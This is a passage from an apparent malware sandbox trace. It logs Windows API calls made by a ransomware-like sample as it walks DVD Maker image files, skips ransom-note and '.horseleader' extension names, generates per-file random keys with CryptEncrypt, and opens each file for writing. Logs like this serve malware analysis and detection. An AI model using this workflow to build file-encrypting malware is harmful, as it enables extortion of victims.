nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.829] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.829] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png") returned 103 [0251.829] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.829] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.829] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.829] lstrlenW (lpString=".testttjffg") returned 11 [0251.830] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.830] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.830] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.830] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f65c205, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f65c205, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.830] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.830] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png") returned 94 [0251.830] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.830] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.830] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.830] lstrlenW (lpString=".testttjffg") returned 11 [0251.830] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.830] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.830] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.831] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f65c205, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f65c205, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.831] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.831] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png") returned 100 [0251.831] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.831] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.831] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.831] lstrlenW (lpString=".testttjffg") returned 11 [0251.831] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.831] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.831] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.831] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.831] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f52b71d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f52b71d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x17719, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="scenesscroll.png", cAlternateFileName="")) returned 1 [0251.831] lstrcmpiW (lpString1="scenesscroll.png", lpString2="Windows") returned -1 [0251.831] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png") returned 80 [0251.832] StrStrIW (lpFirst="scenesscroll.png", lpSrch=".horseleader") returned 0x0 [0251.832] lstrcmpW (lpString1="scenesscroll.png", lpString2="#Decrypt#.txt") returned 1 [0251.832] lstrcmpW (lpString1="scenesscroll.png", lpString2="_uninstalling_.png") returned 1 [0251.832] lstrlenW (lpString=".testttjffg") returned 11 [0251.832] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png", lpSrch=".testttjffg") returned 0x0 [0251.832] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.832] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.832] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.832] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5055c0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5055c0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb30, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="specialmainsubpicture.png", cAlternateFileName="")) returned 1 [0251.832] lstrcmpiW (lpString1="specialmainsubpicture.png", lpString2="Windows") returned -1 [0251.833] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png") returned 89 [0251.833] StrStrIW (lpFirst="specialmainsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.833] lstrcmpW (lpString1="specialmainsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.833] lstrcmpW (lpString1="specialmainsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.833] lstrlenW (lpString=".testttjffg") returned 11 [0251.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.833] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.833] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5c3c91, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5c3c91, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cf, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.833] lstrcmpiW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.833] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png") returned 103 [0251.833] StrStrIW (lpFirst="SpecialNavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.834] lstrcmpW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.834] lstrcmpW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.834] lstrlenW (lpString=".testttjffg") returned 11 [0251.834] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.834] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.834] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.834] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5c3c91, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5c3c91, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.834] lstrcmpiW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.835] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png") returned 109 [0251.835] StrStrIW (lpFirst="SpecialNavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.835] lstrcmpW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.835] lstrcmpW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.835] lstrlenW (lpString=".testttjffg") returned 11 [0251.835] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.835] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.835] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.835] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.836] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f59db34, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f59db34, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cf, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.836] lstrcmpiW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.837] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png") returned 104 [0251.837] StrStrIW (lpFirst="SpecialNavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.837] lstrcmpW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.837] lstrcmpW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.837] lstrlenW (lpString=".testttjffg") returned 11 [0251.837] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.837] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.837] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.838] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f59db34, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f59db34, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.838] lstrcmpiW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.838] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png") returned 110 [0251.838] StrStrIW (lpFirst="SpecialNavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.838] lstrcmpW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.838] lstrcmpW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.838] lstrlenW (lpString=".testttjffg") returned 11 [0251.838] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.838] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.838] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.838] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f55187a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f55187a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1302, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.839] lstrcmpiW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.839] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 101 [0251.839] StrStrIW (lpFirst="SpecialNavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.839] lstrcmpW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.839] lstrcmpW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.839] lstrlenW (lpString=".testttjffg") returned 11 [0251.839] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.839] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.839] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.839] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5779d7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5779d7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.840] lstrcmpiW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.840] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png") returned 107 [0251.840] StrStrIW (lpFirst="SpecialNavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.840] lstrcmpW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.840] lstrcmpW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.840] lstrlenW (lpString=".testttjffg") returned 11 [0251.840] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.840] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.840] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.840] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.842] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fac35, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3fac35, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4aa8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="specialoccasion.png", cAlternateFileName="")) returned 1 [0251.842] lstrcmpiW (lpString1="specialoccasion.png", lpString2="Windows") returned -1 [0251.842] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png") returned 83 [0251.842] StrStrIW (lpFirst="specialoccasion.png", lpSrch=".horseleader") returned 0x0 [0251.842] lstrcmpW (lpString1="specialoccasion.png", lpString2="#Decrypt#.txt") returned 1 [0251.842] lstrcmpW (lpString1="specialoccasion.png", lpString2="_uninstalling_.png") returned 1 [0251.842] lstrlenW (lpString=".testttjffg") returned 11 [0251.842] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png", lpSrch=".testttjffg") returned 0x0 [0251.842] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 